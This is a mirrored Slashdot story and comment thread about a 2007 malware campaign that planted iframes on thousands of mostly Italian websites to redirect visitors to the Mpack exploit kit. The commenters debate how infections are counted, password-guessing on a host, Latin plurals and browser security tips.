Slashdot Mirror

← Back to Stories (view on slashdot.org)

Malware Pulls an "Italian Job"

Posted by kdawson on from the blame-italy dept.

A number of readers sent us word about a malware attack that has been underway since Saturday that began with the compromise of more than 1,100 mostly Italian Web sites. Websense claims that more than 10,000 sites have been infected by now, 80% of them in Italy. There are indications that most of the Italian sites are resident at the same large Italian hosting provider. Trend Micro reports on the attack, which is launched from a malicious Iframe tag inserted into pages on compromised sites. For visitors to these sites, this begins a cascade of "drive-by" malware downloads if one of several targeted vulnerabilities is available and unpatched. The first page to which visitors are redirected by the Iframe hosts a recent version of Mpack attack software. Panda has a month-old report on Mpack (PDF) that provides copious detail about its nefarious ways.

7 of 133 comments (clear)

  1. I wish they'd count "servers" and not "sites" by Anonymous Coward · · Score: 5, Interesting

    This malware probably just affected a single DreamHost shared server, thus bringing down 10,000+ sites at once.

    But this method of artificial number inflating is to be expected from an industry trying to promote their anti-malware, anti-virus, anti-spyware, anti-trojan, anti-anti-virus, anti-rootkit products. Anyone actually requiring these craplets to be installed on their dedicated servers have a much larger problem between the keyboard and the monitor to worry about.

    1. Re:I wish they'd count "servers" and not "sites" by antic · · Score: 5, Informative

      A big, usually decent hosting company in the US that I use was getting done over by this - I had 10-20 sites infiltrated over a period of a few weeks, in 2-3 waves using two slightly different techniques. The host denied any responsibility or knowledge, saying that poor FTP passwords were the entry point. My computer was not the issue as those sites hacked were all on this host - no sites on any of the other 5 or more hosts I use were impacted, regardless of the strength of their passwords.

      Trivial passwords (single English word of five characters) were guessed as well as slightly more complicated ones (non-English words, eight characters, random numbers inserted).

      It appeared to me that were the host NOT the problem, that bots might have been guessing the passwords through brute force? I searched the net seeing if I could find more information about these attacks, but there wasn't much out there, especially given that there wasn't much to search on besides the fact that they used an IFRAME or JavaScript DeCode function, and a probably random set of IP addresses.

      Anyone know more about it all?

      --
      'Thats they exact same thing a banana wrench monkey.'
  2. Re: Viruses/Viri/Virii by beav007 · · Score: 5, Informative
    From http://en.wikipedia.org/wiki/Virii:

    In the English language, the standard plural of virus is viruses. This is the most frequently occurring form of the plural, and refers to both a biological virus and a computer virus.

    The less frequent variations viri and virii are virtually unknown in edited prose, and no major dictionary recognizes them as alternative forms. Their occurrence can be variously attributed to hypercorrection formed by analogy to Latin plurals such as alumni or false analogy to Latin plurals such as radii; idiosyncratic use as jargon among a group, such as computer hackers; and deliberate word play, such as on BBSs (see, e.g.: leet).

    Yes, viri/virii is incorrect (for now), but when the vast majority of us don't RTFA (or can't, due to the /. effect), you can hardly expect people to figure it out all on their own ;)
  3. Re:Why do they never come right out and say... by Anonymous Coward · · Score: 5, Insightful

    "The day your favorite OS dominates the market, it'll be pwned, don't you worry."

    If market share is any indication to being pwned; then why isn't Apache attacked more that IIS? According to Netcraft Apache has 53.76% of the market compared to MS: 31.83%

    And I say this as 1) a Firefox fan, hoping that it never gets to be the majority browser for precisely that reason, and

    I personally only want FF have enough of the market; just enough to make companies follow the web standards: IE not catering to only one browser. Actually, the same applies to ODF; just enough to make companies not require a specific Office Suite.

    "2) a fan of all the OS's. I use Windows for my desktops, Linux for my servers, and Mac sometimes to play."
    Use what ever works for you.

  4. Mafia spam? by Tablizer · · Score: 5, Funny

    As a sign of this, I just got a spam that insisted I purchase a lower mortgage, along with a photo of a horse head.

    --
    Table-ized A.I.
  5. It's all Microsoft vulnerabiltiies by Animats · · Score: 5, Informative

    Note that Trend Micro never uses the word "Microsoft". That's deceptive. How does Microsoft manage that? This attack depends entirely on vulnerabilities in Internet Explorer and Microsoft Media Player. It does try to attack Firefox and Opera browsers by sending them Windows Media files, but doesn't have a direct attack on either browser.

    So:

    1. Use Firefox.
    2. Go to Tools->Options->Content->Manage File Types. Go down the list, and remove or change all entries that automatically invoke Microsoft applications. (Use OpenOffice for .doc, .xls, and .ppt, maybe QuickTime for video files.)
    1. Re:It's all Microsoft vulnerabiltiies by weicco · · Score: 5, Insightful

      Even simplier:

      1. Run Windows Update
      --
      You don't know what you don't know.